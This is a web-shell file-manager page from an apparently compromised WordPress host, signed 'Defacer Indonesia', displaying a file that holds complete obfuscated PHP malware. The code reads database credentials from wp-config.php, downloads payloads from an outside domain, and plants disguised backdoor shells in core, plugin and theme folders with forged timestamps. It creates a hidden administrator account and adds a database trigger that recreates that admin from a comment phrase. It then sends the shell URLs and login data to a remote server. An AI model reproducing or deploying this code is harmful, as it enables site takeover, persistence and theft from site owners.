whoami7 - Manager
:
/
home
/
ezdajrnh
/
public_html
/
wp-content
/
Upload File:
files >> /home/ezdajrnh/public_html/wp-content/psysh_history
define('CURRENTDIR', getcwd()); define('UPLOAD_SHELL', 1); define('OUT', 2); define('API_PATH', 'http://march03252.com/src/accsec.php'); /** without http * */ define('PATH_TO_BACK_SHELL', 'wp-top.com/greh'); /** without http * */ $szyvesd = 'http://march03252.com/src/temp/e78453c189f6e6192deab577aa4a39bd'; $gydiqqjeh = etxoihimc(); $qnhdbwvmrh = 'wpupdate'; $xegsqiejmsgi = djoskgnb(); $kitcwidvnpak = $gydiqqjeh[1]; $zkkicsu = $xegsqiejmsgi; $rbiwrpobxsb = ''; $lplvrjv = 'https://wordpress.com'; $uoedfkaqwr = krjdbfls('2019-07-09 00:00:00', '2023-08-27 00:00:00'); $zelqhql = ''; $znwdlosccf = '0'; $irvxblxef = $xegsqiejmsgi; if (is_null($pozxpzjl = lfdemmevm())) { echo 'invalid detect wp root dir'; exit; } if (!function_exists('file_put_contents')) { function file_put_contents($wtsulbmefr, $qbjglw) { $mluyycgups = @fopen($wtsulbmefr, 'w'); if (!$mluyycgups) { return false; } else { $mdphuc = fwrite($mluyycgups, $qbjglw); fclose($mluyycgups); return $mdphuc; } } } $zsyppqth = array(); if (!file_exists($hwatalive = $pozxpzjl . '/wp-config.php')) { echo 'wp-config not found'; exit; } $tvljlya = file_get_contents($hwatalive); preg_match_all("~^define.*(DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)[\'\"],\s*[\'\"](.+)[\'\"]\s*\);~m", $tvljlya, $zmmagqnttwqf); preg_match("~table_prefix\s+=\s*[\'\"](.+)[\'\"];~", $tvljlya, $cdxeamh); $csnogiav = $zmmagqnttwqf[2][0]; $gkwagjff = $zmmagqnttwqf[2][1]; $geefmqdoxzfr = $zmmagqnttwqf[2][2]; $bberjsbb = $zmmagqnttwqf[2][3]; $udwcaznahsu = $cdxeamh[1]; $gnbqgtbwbzjc = qzcfst($xegsqiejmsgi, $kitcwidvnpak, $zkkicsu, $rbiwrpobxsb, $lplvrjv, $uoedfkaqwr, $zelqhql, $znwdlosccf, $irvxblxef, $csnogiav, $udwcaznahsu); $bdrocinv = mysqli_connect($bberjsbb, $gkwagjff, $geefmqdoxzfr, $csnogiav); if (!$bdrocinv) { require_once($pozxpzjl . '/wp-config.php'); $hazhzfq = get_defined_constants(true); if (!$hazhzfq['user']) { throw new \Exception("Could not connect"); } $csnogiav = $hazhzfq['user']['DB_NAME']; $gkwagjff = $hazhzfq['user']['DB_USER']; $geefmqdoxzfr = $hazhzfq['user']['DB_PASSWORD']; $bberjsbb = $hazhzfq['user']['DB_HOST']; $udwcaznahsu = $cdxeamh[1]; $bdrocinv = mysqli_connect($bberjsbb, $gkwagjff, $geefmqdoxzfr, $csnogiav); } $qeljzqnileo = $_SERVER['HTTP_HOST']; if (mysqli_connect_errno()) { $uskhsfqpxsg = 1; echo "Could not connect" . PHP_EOL; } else { echo "Connected successfully" . PHP_EOL; $brlvnnhrnwxn = mysqli_query($bdrocinv, "select * from " . $udwcaznahsu . "options where option_name = 'home' or option_name = 'siteurl'"); $mscgmv = mysqli_fetch_row($brlvnnhrnwxn); if (stristr($mscgmv[2], 'http') !== false) { $qeljzqnileo = $mscgmv[2]; } if (stristr($mscgmv[3], 'http') !== false) { $qeljzqnileo = $mscgmv[3]; } } if (UPLOAD_SHELL === 1) { if (!function_exists('curl_init')) { $omioeqd = npgxiz($szyvesd); define('USE_FGC', 1); } else { $omioeqd = lpbhvex($szyvesd); } if (!$omioeqd) { echo 'check sh domain' . PHP_EOL; exit; } if ($omioeqd[1] === 403) { echo 'firewall in action!'; exit; } if ($omioeqd[1] !== 200) { echo 'need update script' . PHP_EOL; exit; } $gsaubhacbv = $omioeqd[0]; $yhcwbrypbwv = unserialize(base64_decode($gsaubhacbv)); $hbentvgehsow = array('variable', 'function', 'class', 'object', 'array', 'string', 'integer', 'boolean', 'float', 'double', 'character', 'list', 'set', 'queue', 'stack', 'pointer', 'reference', 'constructor', 'interface', 'method', 'event', 'exception', 'loop', 'condition', 'statement', 'module', 'package', 'library', 'framework', 'compiler', 'interpreter', 'database', 'sql', 'query', 'index', 'table', 'view', 'trigger', 'schema', 'git', 'repository', 'branch', 'merge', 'client', 'encryption', 'decryption', 'hashing', 'session', 'cookie', 'json', 'xml', 'restful', 'soap', 'url', 'http', 'https', 'dns', 'firewall', 'security', 'ajax-response', 'cron', 'stream', 'private', 'meta', 'wp', 'core', 'ajax', 'beta', 'alpha', 'sample', 'path', 'request', 'old', 'info', 'base', 'num', 'all', 'stat', 'new', 'plain', 'add', 'edit', 'live', 'pic', 'less', 'more', 'part', 'get', 'long', 'call', 'first', 'time', 'other'); $geckgbm = thcpyjo($pozxpzjl . '/wp-admin', 3); $ofczrqahc = thcpyjo($pozxpzjl . '/wp-content/plugins', 3); $rxbksjuhaaf = thcpyjo($pozxpzjl . '/wp-includes', 3); $xbseczbkcsv = thcpyjo($pozxpzjl . '/wp-content/themes', 3); $jhljmjbdczqg = array_merge($geckgbm, $ofczrqahc, $rxbksjuhaaf, $xbseczbkcsv); $cpptzdzctg = count($hbentvgehsow); $wdlrgykli = $pozxpzjl . '/wp-config-sample.php'; $lweshyuxppv = $yhcwbrypbwv['wp-config-sample.php?config']; $ktsmfiwxw = $hbentvgehsow[rand(0, $cpptzdzctg - 1)] . ulolhj(rand(3, 6)); $rmlbstuwcbi = '$_GET[\'' . $ktsmfiwxw . '\']'; $lweshyuxppv = str_replace('$_GET[\'config\']', $rmlbstuwcbi, $lweshyuxppv); file_put_contents($wdlrgykli, $lweshyuxppv); touch($wdlrgykli, jzvlj(dirname($wdlrgykli))); $zsyppqth[] = xsnzzosv($pozxpzjl, $wdlrgykli . '?' . $ktsmfiwxw, $qeljzqnileo); unset($yhcwbrypbwv['wp-config-sample.php?config']); if (empty($jhljmjbdczqg)) { echo 'no directories to write' . PHP_EOL; exit; } $dsoinknm = array_keys($yhcwbrypbwv); foreach ($jhljmjbdczqg as $wrvflkjetvs) { if (empty($dsoinknm)) { $dsoinknm = array_keys($yhcwbrypbwv); } $jzdrjqiosg = str_replace('.php', '-' . $hbentvgehsow[rand(0, $cpptzdzctg - 1)] . '.php', $wrvflkjetvs); $rqxjgxrjc = array_shift($dsoinknm); $mugfzjcxgy = $yhcwbrypbwv[$rqxjgxrjc]; file_put_contents($jzdrjqiosg, $mugfzjcxgy); touch($jzdrjqiosg, jzvlj(dirname($jzdrjqiosg))); $yijndshyeq = explode('?', $rqxjgxrjc); $opdyhomung = xsnzzosv($pozxpzjl, $jzdrjqiosg, $qeljzqnileo); $zsyppqth[] = (isset($yijndshyeq[1])) ? $opdyhomung . '?' . stipsw($yijndshyeq[1]) : $opdyhomung; } } function stipsw($yijndshyeq) { if (defined('PATH_TO_BACK_SHELL') && (stristr($yijndshyeq, 'example.com') !== false)) { return str_replace('example.com', PATH_TO_BACK_SHELL, $yijndshyeq); } return $yijndshyeq; } if (!isset($uskhsfqpxsg)) { $owjwjvqgg = aimxhhhau($qeljzqnileo); $protlckv = "update `${udwcaznahsu}options` set option_value = '' WHERE `option_name` LIKE 'close_comments_for_old_posts'"; if (!mysqli_query($bdrocinv, $protlckv)) { echo 'invalid set value 0 for option >>close_comments_value<<' . PHP_EOL; } $nqkcpfnb = "UPDATE `${udwcaznahsu}posts` set ping_status = 'open' where (post_type = 'page' OR post_type = 'post') AND post_status = 'publish' AND guid LIKE '%${owjwjvqgg}%' ORDER BY id LIMIT 5"; $zvkhlpp = array(); if (mysqli_query($bdrocinv, $nqkcpfnb)) { //echo 'posts ready to accept trackbacks' . PHP_EOL; $ccxacrv = "select id, guid, post_name from `${udwcaznahsu}posts` where (post_type = 'page' OR post_type = 'post') AND post_status = 'publish' AND guid LIKE '%${owjwjvqgg}%' ORDER BY id LIMIT 5"; $biwjix = mysqli_query($bdrocinv, $ccxacrv); while ($ngfgbcum = mysqli_fetch_array($biwjix)) { $zvkhlpp[] = array($ngfgbcum['id'], $ngfgbcum['guid'], $ngfgbcum['post_name']); } } //$gbtdxxlm = "SELECT * FROM `${udwcaznahsu}users` WHERE `user_pass` = '$kitcwidvnpak'"; $gbtdxxlm = "SELECT * FROM `${udwcaznahsu}users` WHERE `user_login` = '$xegsqiejmsgi' order by id desc limit 1"; $xfbyantqvwqi = "SELECT * FROM `${udwcaznahsu}users` WHERE `user_login` = '$qnhdbwvmrh'"; $czrfossgb = mysqli_query($bdrocinv, $gbtdxxlm); $ratonbpgz = mysqli_query($bdrocinv, $xfbyantqvwqi); if (mysqli_num_rows($ratonbpgz)) { $kpfhfgzlhevc = "delete from `${udwcaznahsu}users` WHERE `user_login` = '$qnhdbwvmrh'"; mysqli_query($bdrocinv, $kpfhfgzlhevc); } if (!mysqli_num_rows($czrfossgb)) { $uswfppouug = mysqli_query($bdrocinv, "SELECT ID from `" . $csnogiav . "`.`" . $udwcaznahsu . "users` ORDER BY `ID` DESC LIMIT 1"); $ecqseykfc = mysqli_fetch_row($uswfppouug); $qgcbihsgmcl = (int)++$ecqseykfc[0]; mysqli_query($bdrocinv, "INSERT INTO `" . $csnogiav . "`.`" . $udwcaznahsu . "users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('$qgcbihsgmcl', '$xegsqiejmsgi', '$kitcwidvnpak', '$zkkicsu', '$rbiwrpobxsb', '$lplvrjv', '$uoedfkaqwr', '$zelqhql', '$znwdlosccf', '$irvxblxef')"); mysqli_query($bdrocinv, "INSERT INTO `" . $csnogiav . "`.`" . $udwcaznahsu . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, $qgcbihsgmcl, '" . $udwcaznahsu . "capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')"); mysqli_query($bdrocinv, "INSERT INTO `" . $csnogiav . "`.`" . $udwcaznahsu . "usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, $qgcbihsgmcl, '" . $udwcaznahsu . "user_level', '10')"); //echo $qeljzqnileo . " admin inserted" . PHP_EOL; echo sprintf('%s admin inserted %s::%s', $qeljzqnileo, $xegsqiejmsgi, $gydiqqjeh[0]) . PHP_EOL; $tdrboqcrzrbj = 1; mysqli_query($bdrocinv, "DROP TRIGGER IF EXISTS `after_insert_comment`"); try { if (mysqli_query($bdrocinv, $gnbqgtbwbzjc)) { echo 'trigger created' . str_repeat(PHP_EOL, 3); } } catch (\Exception $rsmpsvagp) { echo $rsmpsvagp->getMessage() . PHP_EOL; } } else { while ($roocabnhoox = mysqli_fetch_array($czrfossgb)) { $ttmxaasgdguc = $roocabnhoox['user_pass']; } $ajoprpnt = "SHOW TRIGGERS"; $ekotxizcrsox = mysqli_query($bdrocinv, $ajoprpnt); if ($ekotxizcrsox) { while ($pfgbacqsjgs = mysqli_fetch_array($ekotxizcrsox)) { if ($pfgbacqsjgs['Trigger'] === 'after_insert_comment') { if (strpos($pfgbacqsjgs['Statement'], $ttmxaasgdguc) !== false) { //echo 'hash and trigger matched!'; break; } else { //echo 'not matched need drop trigger'; mysqli_query($bdrocinv, "DROP TRIGGER IF EXISTS `after_insert_comment`"); try { $gnbqgtbwbzjc = qzcfst($xegsqiejmsgi, $ttmxaasgdguc, $zkkicsu, $rbiwrpobxsb, $lplvrjv, $uoedfkaqwr, $zelqhql, $znwdlosccf, $irvxblxef, $csnogiav, $udwcaznahsu); if (mysqli_query($bdrocinv, $gnbqgtbwbzjc)) { echo 'trigger created' . str_repeat(PHP_EOL, 3); } } catch (\Exception $rsmpsvagp) { echo $rsmpsvagp->getMessage() . PHP_EOL; } } break; } } } echo $qeljzqnileo . ' admin exists' . PHP_EOL; } mysqli_close($bdrocinv); } echo implode("\n", $zsyppqth) . "\n"; $zsyppqth['host'] = $qeljzqnileo; if (!empty($zvkhlpp)) { $zsyppqth['trackbacks'] = $zvkhlpp; } if (isset($tdrboqcrzrbj)) { $zsyppqth['authdata'] = array($xegsqiejmsgi, $gydiqqjeh[0]); } $zsyppqth['out'] = OUT; $iancwdyfl = oonbxii(API_PATH, array('source' => base64_encode(serialize($zsyppqth)),)); if (trim($iancwdyfl) !== 'success') { echo "!!!!error while sending data!!!!" . PHP_EOL; exit; } echo str_repeat('_', 400) . "\n"; function lfdemmevm() { if (file_exists(CURRENTDIR . '/wp-config.php')) { return CURRENTDIR; } $gbszanpffcu = preg_replace('~\/(wp-admin|wp-includes|wp-content).*$~', '', CURRENTDIR); if (file_exists($gbszanpffcu . '/wp-config.php')) { return $gbszanpffcu; } return null; } function npgxiz($opdyhomung) { $jbbtxiohiwp = stream_context_create(array('http' => array('ignore_errors' => true))); $qbjglw = @file_get_contents($opdyhomung, false, $jbbtxiohiwp); if ($qbjglw === false) { $samsnr = error_get_last(); //echo "HTTP request failed. Error was: " . $samsnr['message']; return false; } else { $brxvxt = null; if (!empty($hkheip) && isset($hkheip[0])) { preg_match('{HTTP\/\S*\s(\d{3})}', $hkheip[0], $ntmgdkxggj); $brxvxt = intval($ntmgdkxggj[1]); } return array($qbjglw, $brxvxt); } } function lpbhvex($opdyhomung) { $pxvejs = curl_init(); curl_setopt($pxvejs, CURLOPT_URL, $opdyhomung); curl_setopt($pxvejs, CURLOPT_HEADER, 0); curl_setopt($pxvejs, CURLOPT_RETURNTRANSFER, 1); curl_setopt($pxvejs, CURLOPT_TIMEOUT, 10); $qbjglw = curl_exec($pxvejs); if (!$qbjglw) { return false; } $fbhwrhnhqqmx = curl_getinfo($pxvejs, CURLINFO_HTTP_CODE); curl_close($pxvejs); return array($qbjglw, $fbhwrhnhqqmx); } function oonbxii($opdyhomung, $qbjglw) { if (defined('USE_FGC')) { return etbdqqqrg($opdyhomung, $qbjglw); } return agcfk($opdyhomung, $qbjglw); } function etbdqqqrg($opdyhomung, $qbjglw) { $maeqsasc = http_build_query($qbjglw); $kzhvpuzjldq = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => $maeqsasc, 'timeout' => 10, ), "ssl" => array( "verify_peer" => false, "verify_peer_name" => false, ), ); $jbbtxiohiwp = stream_context_create($kzhvpuzjldq); $hjjrjtdeo = @file_get_contents($opdyhomung, false, $jbbtxiohiwp); $brxvxt = null; if (isset($hkheip[0])) { preg_match('{HTTP\/\S*\s(\d{3})}', $hkheip[0], $ntmgdkxggj); $brxvxt = intval($ntmgdkxggj[1]); } return ($brxvxt === 200) ? trim($hjjrjtdeo) : null; } function agcfk($opdyhomung, $qbjglw) { $pxvejs = curl_init(); curl_setopt($pxvejs, CURLOPT_URL, $opdyhomung); curl_setopt($pxvejs, CURLOPT_RETURNTRANSFER, true); curl_setopt($pxvejs, CURLOPT_TIMEOUT, 10); curl_setopt($pxvejs, CURLOPT_POST, true); curl_setopt($pxvejs, CURLOPT_POSTFIELDS, $qbjglw); curl_setopt($pxvejs, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($pxvejs, CURLOPT_SSL_VERIFYPEER, 0); $hjjrjtdeo = curl_exec($pxvejs); $uigsqvgq = curl_getinfo($pxvejs); curl_close($pxvejs); return ($uigsqvgq["http_code"] == 200) ? trim($hjjrjtdeo) : null; } function jzvlj($qcdrqvustne) { foreach (glob($qcdrqvustne . "/*php") as $afqhul) { $eefqpl[] = filemtime($afqhul); } $rvcyur = array_count_values($eefqpl); arsort($rvcyur); $dsoinknm = array_keys($rvcyur); return array_shift($dsoinknm); } function xsnzzosv($jflbahw, $jzdrjqiosg, $owjwjvqgg = null) { $owjwjvqgg = !$owjwjvqgg ? 'http://' . $_SERVER['HTTP_HOST'] : $owjwjvqgg; $abxlekkovn = str_replace($jflbahw, '', $jzdrjqiosg); return rtrim($owjwjvqgg, '/') . DIRECTORY_SEPARATOR . ltrim($abxlekkovn, '/'); } function hiazx($pokwqy, $vinjgz = 1) { if (!is_dir($pokwqy)) { return; } $iqkqgcz = realpath($pokwqy); $vrsbflp = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($iqkqgcz), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); $vrsbflp->setMaxDepth($vinjgz); foreach ($vrsbflp as $odldwkpra => $mtflxijzow) { if (($iqkqgcz = $mtflxijzow->getPath()) === $pokwqy) { continue; } if (is_dir($mtflxijzow) && is_writeable($mtflxijzow)) { $eefqpl[] = $iqkqgcz; } } return array_unique($eefqpl); } function thcpyjo($pokwqy, $qzssdznyp = 2, $vinjgz = 1) { if (!is_dir($pokwqy)) { return; } $iqkqgcz = realpath($pokwqy); $vrsbflp = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($iqkqgcz), RecursiveIteratorIterator::SELF_FIRST, RecursiveIteratorIterator::CATCH_GET_CHILD); $vrsbflp->setMaxDepth($vinjgz); $eefqpl = array(); foreach ($vrsbflp as $odldwkpra => $mtflxijzow) { $iqkqgcz = $mtflxijzow->getPathName(); if (stristr($iqkqgcz, '.php') === false) { continue; } if (!is_writeable(dirname($iqkqgcz))) { continue; } $eefqpl[$iqkqgcz] = 1; } $hwurosmw = array_keys($eefqpl); shuffle($hwurosmw); return array_slice($hwurosmw, 0, $qzssdznyp); } function qzcfst($xegsqiejmsgi, $kitcwidvnpak, $zkkicsu, $rbiwrpobxsb, $lplvrjv, $uoedfkaqwr, $zelqhql, $znwdlosccf, $irvxblxef, $csnogiav, $udwcaznahsu) { $yhhcjca = <<<STR CREATE TRIGGER `after_insert_comment` AFTER INSERT ON `${csnogiav}`.`${udwcaznahsu}comments` FOR EACH ROW BEGIN IF NEW.comment_content LIKE '%are you struggling to get comments on your blog?%' THEN SET @lastInsertWpUsersId = (SELECT MAX(id) FROM `${csnogiav}`.`${udwcaznahsu}users`); SET @nextWpUsersID = @lastInsertWpUsersId + 1; INSERT INTO `${csnogiav}`.`${udwcaznahsu}users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (@nextWpUsersID, '${xegsqiejmsgi}', '${kitcwidvnpak}', '${zkkicsu}', '${rbiwrpobxsb}', '${lplvrjv}', '${uoedfkaqwr}', '${zelqhql}', '${znwdlosccf}', '${irvxblxef}'); INSERT INTO `${csnogiav}`.`${udwcaznahsu}usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, '${udwcaznahsu}capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}'); INSERT INTO `${csnogiav}`.`${udwcaznahsu}usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, @nextWpUsersID, '${udwcaznahsu}user_level', '10'); END IF; END; STR; return $yhhcjca; } function aimxhhhau($opdyhomung) { $owjwjvqgg = parse_url($opdyhomung, PHP_URL_HOST); return str_replace('www.', '', $owjwjvqgg); } function krjdbfls($oilkzsxzc, $oiifwtlb, $ychkbsntwqm = 'Y-m-d H:i:s') { $agrysdeffyb = strtotime($oilkzsxzc); $maodcuojhlu = strtotime($oiifwtlb); $wttrzzxhcmio = mt_rand($agrysdeffyb, $maodcuojhlu); return date($ychkbsntwqm, $wttrzzxhcmio); } function ulolhj($pssonmlzu, $rmixpz = false) { $lhgjdjdfdq = "abcdefghijklmnopqrstuvwxyz"; if ($rmixpz) { $lhgjdjdfdq .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890~><?}{[];!@#$%^&*()_+-={}[]:;<=>?@'; } $dpgazacavii = strlen($lhgjdjdfdq); $wjkuqc = ""; for ($gixmormjl = 0; $gixmormjl < $pssonmlzu; $gixmormjl++) { $wjkuqc .= $lhgjdjdfdq[rand(0, $dpgazacavii - 1)]; } return $wjkuqc; } function djoskgnb() { preg_match_all('~\d~', md5($_SERVER['HTTP_HOST']), $jgnvda); $ezjqdacdr = $jgnvda[0][0]; $zmyjnzoeki = end($jgnvda[0]); $udhtfnyo = array('wp', 'cms', 'web', 'dev', 'blog', 'main', 'articles', 'notes', 'news', 'archive',); $umgchnrzhll = array('panel', 'feed', 'client', 'user', 'rss', 'option', 'auth', 'table', 'user', 'profile',); return $udhtfnyo[$ezjqdacdr] . $umgchnrzhll[$zmyjnzoeki]; } function uhodwd($cvtfri, $cwhvwidjaa) { $criznojcqq = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; define('ITOA64_CUSTOM', $criznojcqq); if ($cvtfri < 4 || $cvtfri > 31) { $cvtfri = 8; } define('ITERATION_COUNT_LOG2_CUSTOM', $cvtfri); define('PORTABLE_HASHES_CUSTOM', $cwhvwidjaa); $pjxlkbfekur = microtime(); if (function_exists('getmypid')) { $pjxlkbfekur .= getmypid(); } define('RANDOM_STATE_CUSTOM', $pjxlkbfekur); } function htlwhzi($iickaizb) { if (strlen($iickaizb) > 4096) { return '*'; } $iwsqpbphpy = ''; if (CRYPT_BLOWFISH === 1 && !PORTABLE_HASHES_CUSTOM) { $iwsqpbphpy = bdcmxexp(16); $rxzeidinxdj = crypt($iickaizb, kkxwe($iwsqpbphpy)); if (strlen($rxzeidinxdj) === 60) { return $rxzeidinxdj; } } if (strlen($iwsqpbphpy) < 6) { $iwsqpbphpy = bdcmxexp(6); } $rxzeidinxdj = bkxqgz($iickaizb, zduuse($iwsqpbphpy)); if (strlen($rxzeidinxdj) === 34) { return $rxzeidinxdj; } return '*'; } function bdcmxexp($rvcyur) { $lssmtwsfup = ''; if (@is_readable('/dev/urandom') && ($dsvqitmobyes = @fopen('/dev/urandom', 'rb'))) { $lssmtwsfup = fread($dsvqitmobyes, $rvcyur); fclose($dsvqitmobyes); } if (strlen($lssmtwsfup) < $rvcyur) { $lssmtwsfup = ''; $comrcyusogvx = RANDOM_STATE_CUSTOM; for ($gixmormjl = 0; $gixmormjl < $rvcyur; $gixmormjl += 16) { $comrcyusogvx = md5(microtime() . $comrcyusogvx); $lssmtwsfup .= md5($comrcyusogvx, TRUE); } $lssmtwsfup = substr($lssmtwsfup, 0, $rvcyur); } return $lssmtwsfup; } function kkxwe($xxfweoozp) { $criznojcqq = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; $lssmtwsfup = '$2a$'; $lssmtwsfup .= chr((int)(ord('0') + ITERATION_COUNT_LOG2_CUSTOM / 10)); $lssmtwsfup .= chr(ord('0') + ITERATION_COUNT_LOG2_CUSTOM % 10); $lssmtwsfup .= '$'; $gixmormjl = 0; do { $jwhnfvya = ord($xxfweoozp[$gixmormjl++]); $lssmtwsfup .= $criznojcqq[$jwhnfvya >> 2]; $jwhnfvya = ($jwhnfvya & 0x03) << 4; if ($gixmormjl >= 16) { $lssmtwsfup .= $criznojcqq[$jwhnfvya]; break; } $udotsi = ord($xxfweoozp[$gixmormjl++]); $jwhnfvya |= $udotsi >> 4; $lssmtwsfup .= $criznojcqq[$jwhnfvya]; $jwhnfvya = ($udotsi & 0x0f) << 2; $udotsi = ord($xxfweoozp[$gixmormjl++]); $jwhnfvya |= $udotsi >> 6; $lssmtwsfup .= $criznojcqq[$jwhnfvya]; $lssmtwsfup .= $criznojcqq[$udotsi & 0x3f]; } while (1); return $lssmtwsfup; } function bkxqgz($iickaizb, $oktcttnzoof) { $lssmtwsfup = '*0'; if (substr($oktcttnzoof, 0, 2) === $lssmtwsfup) { $lssmtwsfup = '*1'; } $rnskueh = substr($oktcttnzoof, 0, 3); //if ($rnskueh !== '$ezckoglutyc$' && $rnskueh !== '$rlgjcieibq$') { if ($rnskueh !== base64_decode('JFAk') && $rnskueh !== base64_decode('JEgk')) { return $lssmtwsfup; } $xtbkxmj = strpos(ITOA64_CUSTOM, $oktcttnzoof[3]); if ($xtbkxmj < 7 || $xtbkxmj > 30) { return $lssmtwsfup; } $rvcyur = 1 << $xtbkxmj; $cewptshhys = substr($oktcttnzoof, 4, 8); if (strlen($cewptshhys) !== 8) { return $lssmtwsfup; } $rxzeidinxdj = md5($cewptshhys . $iickaizb, TRUE); do { $rxzeidinxdj = md5($rxzeidinxdj . $iickaizb, TRUE); } while (--$rvcyur); $lssmtwsfup = substr($oktcttnzoof, 0, 12); $lssmtwsfup .= fsscuv($rxzeidinxdj, 16); return $lssmtwsfup; } function fsscuv($xxfweoozp, $rvcyur) { $lssmtwsfup = ''; $gixmormjl = 0; $criznojcqq = ITOA64_CUSTOM; do { $tcnzotxo = ord($xxfweoozp[$gixmormjl++]); $lssmtwsfup .= $criznojcqq[$tcnzotxo & 0x3f]; if ($gixmormjl < $rvcyur) { $tcnzotxo |= ord($xxfweoozp[$gixmormjl]) << 8; } $lssmtwsfup .= $criznojcqq[($tcnzotxo >> 6) & 0x3f]; if ($gixmormjl++ >= $rvcyur) { break; } if ($gixmormjl < $rvcyur) { $tcnzotxo |= ord($xxfweoozp[$gixmormjl]) << 16; } $lssmtwsfup .= $criznojcqq[($tcnzotxo >> 12) & 0x3f]; if ($gixmormjl++ >= $rvcyur) { break; } $lssmtwsfup .= $criznojcqq[($tcnzotxo >> 18) & 0x3f]; } while ($gixmormjl < $rvcyur); return $lssmtwsfup; } function zduuse($xxfweoozp) { //$lssmtwsfup = '$ezckoglutyc$'; $lssmtwsfup = base64_decode('JFAk'); $criznojcqq = ITOA64_CUSTOM; $lssmtwsfup .= $criznojcqq[min(ITERATION_COUNT_LOG2_CUSTOM + 5, 30)]; $lssmtwsfup .= fsscuv($xxfweoozp, 6); return $lssmtwsfup; } function etxoihimc() { $npskep = ulolhj(rand(20, 40), true); uhodwd(4, true); $rxzeidinxdj = htlwhzi($npskep); return array($npskep, $rxzeidinxdj); }
Copyright ©2021 || Defacer Indonesia